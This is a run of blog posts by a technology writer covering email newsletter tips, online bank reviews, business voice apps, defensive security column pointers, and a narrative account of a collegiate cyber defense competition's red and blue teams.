FIR B2B podcast #119: Our favorite email newsletter tips

Paul Gillin and I are old hands at email newsletters. Paul had his own for several years and has produced several for his clients. I currently publish two: my own Web Informant, which I have been doing almost weekly since 2003, and Inside Security which is part of a group of newsletters. We share a few tips from our years of experience.

The first is to know your audience and segment them for best results. This post in Marketing Week documents how marketers are segmenting the audiences at a much finer level than they previously did thanks to an explosion in behavioral data from third parties. One bottled water vendor was able to dramatically boost the response rate of its YouTube ads with an email newsletter sliced by 16 different segments. The survey found that behavior and location are the most effective segmentation methods, with the old stalwarts like age and gender being the least effective.

We discuss how to craft your subject line and choose a coherent theme as well as how to pick the optimal length and number of hyperlinks to include. If you do use links, beware of URL shortening services, since many as spam filters block them. There’s also the question of whether to make your newsletters text-only or to go the HTML route. If you choose the latter, be sure to test each newsletter with different browsers and different screen depths. Finally, we cover how to choose the right tool for the mailings. We’ve used a variety of them over the years, and each has different strengths and weaknesses. Some of these topics are mentioned in this piece for Marketing360.

We’d love to hear from you about your favorite email newsletters and tips for creating your own. You can listen to our 16 min. podcast here:

Security Intelligence: How to Defend Your Organization Against Fileless Malware Attacks

The threat of fileless malware and its potential to harm enterprises is growing. Fileless malware leverages what threat actors call “living off the land,” meaning the malware uses code that already exists on the average Windows computer. When you think about the modern Windows setup, this is a lot of code: PowerShell, Windows Management Instrumentation (WMI), Visual Basic (VB), Windows Registry keys that have actionable data, the .NET framework, etc. Malware doesn’t have to drop a file to use these programs for bad intentions.

Given this growing threat, I provide several tips on what can security teams can do to help defend their organizations against these attacks in my latest post for IBM’s Security Intelligence blog.

How to protect your mobile apps using Zimperium’s zIAP SDK (screencast)

If you are looking for a way to protect your Android and iOS apps from malware and other mobile threats, you should look at Zimperium ‘s In-App Protection (zIAP) SDK . It supports both Apple X-Code for iOS apps and Android Studio for those apps. One of the advantages of zIAP is that you don’t have to redeploy your code because changes are updated dynamically at runtime and automatically pushed to your devices. zIAP ensures that mobile applications remain safe from cyber attacks by providing immediate device risk assessments and threat alerts. Organizations can minimize exposure of their sensitive data, and prevent their customers and partners’ data from being jeopardized by malicious and fraudulent activity. I tested the product in April 2019.

Pricing starts for 10K Monthly Active Devices at $12,000 per year, with steep quantity discounts available.

https://go.zimperium.com/david-strom-ziap

Keywords: strom, screencast review, webinformant, zimperium, mobile security, app security, Android security, iOS security

RSA blog: Third-party risk is the soft underbelly of cybersecurity

In the past several weeks, we have seen the effects of ignoring the risks of our third-party vendors. They can quickly put your enterprise in peril, as this story about a third-party provider to the airline industry illustrates. In this case, a back-end database supplier grounded scheduled flights because of a computer outage. And then there is this story about how two third-party providers from Facebook exposed more than 500M records with unsecured online databases. These are just the more notable ones. Hackers are getting cleverer about how and when they attack us, and often our third-party apps and vendors are the soft underbelly of our cybersecurity. Witness the various attacks on point-of-sale vendors or back-end database vendors, payment providers or ecommerce plug-ins, etc. And then there are system failures, such as what happened to the airline databases.

You can read my column on RSA’s blog here about what to do about managing third-party threats.

CSOonline: How to improve container security

Gartner has named container security one of its top ten concerns for this year, so it might be time to take a closer look at this issue and figure out a solid security implementation plan. While containers have been around for a decade, they are becoming increasingly popular because of their lightweight and reusable code, flexible features and lower development cost. In this post for CSOonline, I’ll look at the kinds of tools needed to secure the devops/build environment, tools for the containers themselves, and tools for monitoring/auditing/compliance purposes. Naturally, no single tool will do everything.

FIR B2B podcast #118: Customers as advocates, ODI progress and why you need a style guide

We have a trio of discussion items on this week’s podcast with myself and Paul Gillin. The first is from DigitalCommerce360 and concerns how customers should be your best advocates at building your brand identity and promoting your company. Marketers who focus on improving the customer experience and figuring out ways to regularly listen to customers’ desires and complaints can benefit from low-cost and powerful word-of-mouth promotion. So why don’t more B2B marketers have programs aimed at loyal customers?

Late last month there was some progress to report on the Open Data Initiative, a standards effort launched last fall that seeks to create a standard for the interchange of marketing data. Sounds boring, but with marketers spending more on analytics than IT organizations these days, we thing it’s important. Executives from Adobe, Microsoft and SAP just gave more details about how the three will standardize interfaces among their products to help common customers get a clearer view of their customers without going through a lot of messy data transformation. The trio also announced a slew of VAR partners that will support ODI. But the list was also notable for the big companies that weren’t there, like Oracle, Salesforce.com and marketing automation vendors.

Our final item is How to Create a Style Guide for Content Marketing. Too often marketers jump in to content programs without laying the groundwork for a consistent style and direction for their blogs and websites. Having a solid style guide isn’t just about where to place your commas but the right tone of voice and point of view that your authors should take. There is a lot of good advice in this piece.

You can listen to our 14 min. podcast here:

How business voice-enabled apps will become the next thing

If you have an Alexa or Google Home nearby, you probably already know how handy it can be to help your life. But what you may not be as aware is how businesses are adopting voice-enabled information access, and how this technology could become as revolutionary as HTML and websites were back in the 1990s.

I got to see some of this future at the Prepare.AI conference yesterday here in St. Louis. In particular, a presentation by Bob Stolzberg, the founder of VoiceXP, a two-year old startup that is beginning to make some noise with a voice toolkit that is aimed at business. At the show, Bob demonstrated a couple of examples, using an Alexa as his speaking partner.

One was an app developed for Mercy Health, so you can locate the nearest doctor with just a few commands (Say “Alexa, Start Mercy”). Another was for a law firm, so you can use voice commands to find a lawyer after you have been in an auto accident. One app showed how an executive could easily get various business metrics reported via voice, rather than plowing through a bunch of spreadsheets. One for a scientific research company allows their researchers to add experimental notes via voice commands, so they don’t have to remove their gloves and type them in. “Businesses are adopting voice apps to start their conference calls, to integrate with Slack as replacements for front-desk check-in kiosks, and numerous other apps. We are living in a voice-enabled world,” he said at the conference. They have a few demos on their site with apps that they have built for other companies as well.

The Mercy app was a significant effort, taking a good-sized team working over several months and a pretty substantial budget to put it together. That experience got them working on a much easier path for developing business voice apps so that ordinary folks could build them without a lot of programming or systems integration knowledge. They call it their Voice Experience Platform. They are still in beta but nearing its launch with several different plans that include managed services hosting, custom lead gen features and help with on-boarding the apps. They also provide a voice marketing plan that teaches business how to successfully market their new voice experience.

Voice-enabled apps do have their downside, namely a threat to our privacy and potential misuse by bad actors. Given that the Alexa/Home device is always listening, this data could be captured or subject to a man-in-the-middle attack without the proper security posture. VoiceXP has security built into its platform, which is encouraging. “What if a rogue device shared confidential medical data,” asks Adam Levine, a privacy expert. “These new technical advances may make our lives easier, but we need see a greater focus on privacy.”

Another issue is that to voice-enable your corporate apps, you need someway to access them programmatically. That could be trouble: with one of their customers, VoiceXP ended up using a complex spreadsheet and pulling data directly from that into their platform.

Finally, voice apps touch many different parts of your organization, similar to how web apps did when they were first created back in the day. You will need to keep an open mind, build your team accordingly, and empower them to collaborate to formulate best practices to make them work successfully.

If you have examples of your favorite business-related skill or action (as these apps are called), do share them in the comments.

My experiences with online banking

This week saw the announcement of Apple Card, a credit card that doesn’t even a number on its face. While it remains to be seen if Apple will be successful here, certainly we are witnessing a new era of online financial services. More to the point are the development of open banking in the UK. The idea behind open banking was standardizing on APIs to make it easier to move from one bank to another. We are far from that here in the States but there are many innovators in the banking field. As a big proponent of online banking, here is my report on what I have been using and how they work, for Simple, Aspiration, USAA and Marcus.

Simple was one of the first online banks and I have had an account for several years. They offer  no-fee checking/savings and VISA debit cards, although there are some fees for foreign transactions and some ATMs. Opening an account takes minutes and their web interface is clean and easy to understand with superior online help and telephone support.

Marcus is the online entity of Goldman Sachs (who is one of the partners for the Apple Card) and they have two main products: high-interest CDs (right now they offer a five year 3.1% rate) and no-fee loans (6% APR). Opening an account takes minutes and their web interface is clean and simple to understand. I had some issues setting up joint accounts and their telephone support was efficient and helpful and resolved it quickly.

Aspiration offers no-fee checking and debit cards. Actually, that isn’t quite accurate: you decide on the fees that you wish to pay them. It is an interesting gimmick. You can select nothing, and you can change the amount as often as you wish. There are some third-party fees, such as for wire transfers, that they pass along at their cost. They also make it easier for you to donate money to particular causes that you can setup online.

Activating my debit card from them required a call to their telephone support center. This could have been a network problem that they were experiencing at the time. They have a mobile app where they have spent more development time, and their web interface is pretty spare.

USAA has been in the online financial services world for a very long time, and it shows. If you have a family member that has served in the military you can open an account. They offer life, car and home insurance, CDs, credit cards, mutual funds and many more products. They try to keep their costs low and usually send me a small check at the end of the year as a “dividend” to thank me for being a member. I have had my car insurance with them for a long time and they have superior claims service and amazing response time from their telephone call center.  

If you are looking for online banking services, here are some things to look out for:

What services do you need? If you just want a no- or low-fee credit card, there are many solutions, including products from regular card issuers. If you need more online services, you will have fewer choices. USAA offers the widest spectrum and as I said has been doing it for the longest time. 

Opening and funding your account. You want a provider that has taken the time to build a simple and easy-to-use interface. Each provider does this slightly differently. All offer the ability to enter your bank routing and account numbers and make two test small deposits that you have to verify or you can provide your funding bank’s username and password. Aspiration had two issues: they made finding the external funding menus hard to find, and also they took a week to fund my account. The others were speedier with their funds transfer. Marcus wins this category. 

Making deposits, money transfers and obtaining reports. This is the meat of any provider and most have obvious ways of doing this. My local online bank had two separate procedures for funding and then linking an external account, which was annoying and took two calls to their phone support center to resolve. None of the four were any better or worse than others.

What are the hidden fees? Simple is my favorite here, they were one of the first to be very explicit about the fees they charge. Plus, you can find out everything without having to become a customer. The others are less transparent, although they all offer lower fees than your traditional retail bank (as they should).

What are the MFA implementation(s)? Both Simple and Aspiration offer SMS PINs to authenticate, and once you set this up, you can’t change anything without calling them. But the real standout is USAA, which in addition has other options as explained here, including support for Symantec’s VIP smartphone app. All of these are easily changed online, as long as you can find the linked URL above.

If you check this list of MFA options for the banking sector, you will see support for the MFA authentication smartphone apps is pretty sparse. Sigh.

International travel. Simple and Aspiration both offer quick notification of when and where you travel online, which is appealing to me and one of the reasons I went down this rabbit hole. For many years, I only had one credit card that I would pay off the balance each month. When I began doing more international travel, I realized that I wanted to minimize my exposure if my high-credit-limit card was lost or stolen. I opened an account with Simple, one of the first online banks.  

Do they offer a mobile app? Simple and Aspiration both offer them and focus on mobile as their primary method for customer transactions.

As you can see, no single provider is strong in all areas, which is a shame because you would hope their development teams could learn from the best examples and enhance their sites.  

Some final words of wisdom: prepare to spend some time with your own research and step into these waters gingerly before committing a lot of your money with any provider. Find out what your local bank offers with their online services, as many of them realize they have to be competitive in this area. And feel free to make recommendations of your own experience in the comments.  

Behind the scenes at a regional NCCD competition

Every year hundreds of college students compete in the National Collegiate Cyber Defense Competition. Teams from around the country begin with regional competitions, and the winners of those go on to compete for bragging rights and cash prizes at the national event in Orlando held at the end of April. A friend of mine from the Seattle area, Stephen Kangas, was one of the volunteers, all of whom are drawn from IT security professionals. I spoke to him this week about some of his experiences. The event tries to simulate defending a simulated corporate network, and is divided into two basic teams: the defenders who comprise the blue teams from the colleges, and the attackers, or red team. In addition, there are other groups, such as the judges and the “orange team” which I will get to in a moment. There is also a team of judges with body cams to record the state of play are assigned to each blue team and these are used to tally up the final point totals. Points are also awarded based on the number of services that are still online and haven’t been hacked, as well as those systems which were hacked and then recovered. Both teams have to file incident reports and these are also evaluated as part of the scores.

Stephen has participated at the competition for several years as a mentor and coach for a team from a local high school that competes in the high school division. This year he was on one of the red teams attacking one of the college blue teams. He has his Certified Ethical hacker credential and is working towards a MS in Cybersecurity degree too. He has been involved in various IT roles both as a vendor and as a consultant, including a focus in information security, for decades. “I wanted to expand my knowledge in this area. Because most of my experience has been on defensive side, I wanted to get better, and for that you have to know about the strategy, tools, and tactics used by the offensive black hats out there.”

The event takes place over a weekend and the red team attackers take points away from the defenders for penetrating their corresponding blue team’s network and “pwning” their endpoints, servers, and other devices. “I was surprised at how easy it was to penetrate our target’s network initially. People have no idea how vulnerable they are as individuals and it is becoming easier every day. We need to be preparing and helping people to develop the knowledge and skills to protect us.” His red team consisted of three others that had complementary specializations, such as email, web and SQL server penetration and different OSs. Each of the 30 red team volunteers brings their own laptop and but they all use the same set of hacking tools (which includes Kali Linux, Cobalt Strike, and Empire, among others), and the teams communicate via various Slack channels during the event.

The event has an overall red team manager who is taking notes and sharing tips with the different red teams. Each blue team runs an exact VM copy of the scenario, with the same vulnerabilities and misconfigurations. This year it was a fake prison network. “We all start from the same place. We don’t know the network topology, which mimics the real-world situation where networks are poorly documented (if at all).” Just like in the real world, blue teams were given occasional injects, such as deleting a terminated employee or updating the release date of a prisoner; the red teams were likewise given occasional injects, such as finding and pwning the SQL server and changing the release date to current day.

In addition to the red and blue teams is a group they call the orange team that adds a bit of realism to the competition. These aren’t technical folks but more akin to drama students or improv actors that call into the help desk with problems (I can’t get my email!) and read from scripted suggestions to also put more stress on the blue team to do a better job of defending their network. Points are awarded or taken away from blue teams by the judges depending upon how they handle their Help Desk phone calls.

Adding additional realism, during the event members of each red team make calls with the help desk, pretending to be an employee, trying to social engineer them for information. “My team broke in and pwned their domain controllers. We held them for ransom after locking them out of their Domain Controller, which we returned in exchange for keys and IP addresses to some other systems. Another team called and asked ransom for help desk guy to sing a pop song. They had to sing well enough to get back their passwords.” His team also discovered several Linux file shares that had employee and payroll PII on it.

His college’s team came in second, so they are not going on to the nationals (University of Washington won first place). But still, all of the college students learned a lot about better defense that they can use when competing next year, and ultimately when they are employed after graduation.  Likewise, the professionals on the red teams learned new tools and techniques from each other that will benefit them in their work. It was an interesting experience and Stephen intends to volunteer for Pacific Rim region CCDC again next year.

RSA blog: Understanding the trust landscape

Earlier this month, president of RSA, Rohit Ghai, opened the RSA Conference in San Francisco with some stirring words about understanding the trust landscape. The talk is both encouraging and depressing, for what it offers and for how far we have yet to go to realize this vision completely.

Back in the day, we had the now-naïve notion that defending a perimeter was sufficient. If you were “inside” (however defined), you were automatically trusted. Or once you authenticated yourself, you were then trusted. It was a binary decision: in or out. Today, there is nothing completely inside and trusted anymore.

I go into more detail in my blog post, Understanding the trust landscape here. I had an opportunity to  spend some time with Rohit at a presentation we both did in London earlier this year and enjoyed exchanging many ideas with him.